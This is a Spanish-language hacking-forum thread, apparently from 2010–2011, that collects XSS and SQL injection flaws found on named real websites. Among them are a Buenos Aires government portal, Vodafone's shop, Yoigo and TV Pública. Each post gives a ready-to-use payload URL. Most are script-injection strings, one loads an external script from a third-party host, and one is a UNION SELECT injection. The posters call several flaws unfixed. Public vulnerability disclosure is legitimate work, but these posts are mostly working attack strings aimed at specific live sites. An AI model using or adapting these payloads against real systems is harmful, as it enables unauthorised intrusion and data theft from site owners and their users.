 Autor
|
Tema: Recopilatorio de Vulnerabilidades de XSS/SQLinjection (Leído 88,476 veces)
|
|
|
|
|
|
|
|
|
|
|
Cleantesdeasso
 Desconectado
Mensajes: 185
|
Sitio web:http://www.buenosaires.gov.ar/areas/educacion/establecimientos/index.php?idgestion= Descubridor:clean735 URL del aviso:http://txt.io/clean735 Fecha de descubrimiento:10 de diciembre 2010 Fecha de notificación:10 de diciembre Fecha de publicación: 10 de diciembre Arreglado: no lo se Información adicional:no m gusta macri. XSS en el buscador http://www.buenosaires.gov.ar/areas/educacion/establecimientos/index.php?idgestion=0&idoferta&idsala=0&idjornada=0&idmodalidad=0&idtitulo=0&idbarrio&idcgpc&distrito&texto=%3Cimg+src%3D.+onerror%3Dalert%28String.fromCharCode%2877%2C97%2C99%2C114%2C105%2C95%2C110%2C97%2C122%2C105%29%29%3E&Buscar2=Buscar&redir=1&menu_id=10194
|
|
|
|
|
En línea
|
"Que no!! q el hash hay q crakiarlo!!"
|
|
|
iNETFRUIT
Desconectado
Mensajes: 8
|
Sitio web: http://www.soy.es/Descubridor: INETFRUIT + Fecha de descubrimiento: 28 de Diciembre del 2010 Fecha de notificación: 28 de Diciembre del 2010 Fecha de publicación: 01 de Enero del 2011 Arreglado : no, unfixed. Información adicional: Blogs gratis http://soy.es/index.php?pag=indice&cat=1+and+1=2+union/**/select+0x30,0x31,0x32,concat%280x3A3078623464633064333A%29,0x34,0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139,0x3230,0x3231,0x3232,0x3233,0x3234,0x3235--+--
|
|
|
|
|
En línea
|
|
|
|
tragantras
Desconectado
Mensajes: 465
|
Sitio web: http://tienda.vodafone.esDescubridor: tragantras URL del aviso: http://pastebin.com/8Q9789Y6Fecha de descubrimiento: 17 Mayo del 2007 Fecha de notificación: 17 Mayo del 2007 Fecha de publicación: 17 Mayo del 2007 Arreglado: Not yet! Información adicional: XSS
http://tienda.vodafone.es/movil/samsung/galaxy_s_8gb?s=asdf%22%3Easd%3C/a%3E%3CsCrIpT%3Ealert%28%27xungo%20XSS!%27%29;%3C/sCrIpT%3E%3Csdf%20foo=%22
|
|
|
|
|
En línea
|
|
|
|
tragantras
Desconectado
Mensajes: 465
|
Sitio web: www.yoigo.comDescubridor: tragantras URL del aviso: http://pastebin.com/WcRqGqaWFecha de descubrimiento: 21 Mayo del 2007 Fecha de notificación: 21 Mayo del 2007 Fecha de publicación: 21 Mayo del 2007 Arreglado: Not yet! Información adicional: XSS
POC FIREFOX & SECURELESS WEB-BROWSERS
http://www.yoigo.com/buscador.php?buscar=%22%20/%3E%3Cscript%3Ealert%283%29;%3C/script%3E
POC CHROME:
http://www.yoigo.com/buscador.php?buscar=%22%3E%3Cscript%20src=http://ha.ckers.org/xss.js?
|
|
|
|
« Última modificación: 21 Mayo 2011, 01:07 am por tragantras »
|
En línea
|
|
|
|
franco_tuv
Desconectado
Mensajes: 5
|
Sitio web: http://www.tvpublica.com.arDescubridor: franco_tuv Fecha de descubrimiento: 20 de Julio del 2011 Fecha de notificación: 20 de Julio del 2011 Fecha de publicación: 23 de Julio del 2011 Arreglado : No Información adicional: http://www.tvpublica.com.ar/tvpublica/busqueda?searchText=%3Cscript%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/script%3E&page=1 |
|
|
|
|
En línea
|
|
|
|
|
| Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
Recopilatorio de C#
.NET (C#, VB.NET, ASP)
|
/* strcpy() */
|
3
|
8,415
|
5 Junio 2007, 17:50 pm
por piroman
|
|
|
|
Como hacer update en SQLinjection
Nivel Web
|
BlackHKR
|
6
|
6,491
|
12 Mayo 2010, 20:55 pm
por BHK
|
|
|
|
Duda SQLinjection en information_schema
« 1 2 »
Nivel Web
|
miguelskk
|
10
|
8,530
|
17 Julio 2010, 01:46 am
por TapIt
|
|
|
|
AYUDA:Captura de paquetes con Wireshark para herramienta SQLinjection
Hacking
|
NetStorm
|
1
|
3,838
|
5 Octubre 2011, 00:06 am
por alpha015
|
|
|
|
SQLInjection sin acceso a information_schema
Nivel Web
|
buggy_man
|
3
|
3,285
|
11 Agosto 2012, 07:17 am
por afdlkglfgfdgfhgf
|
 |
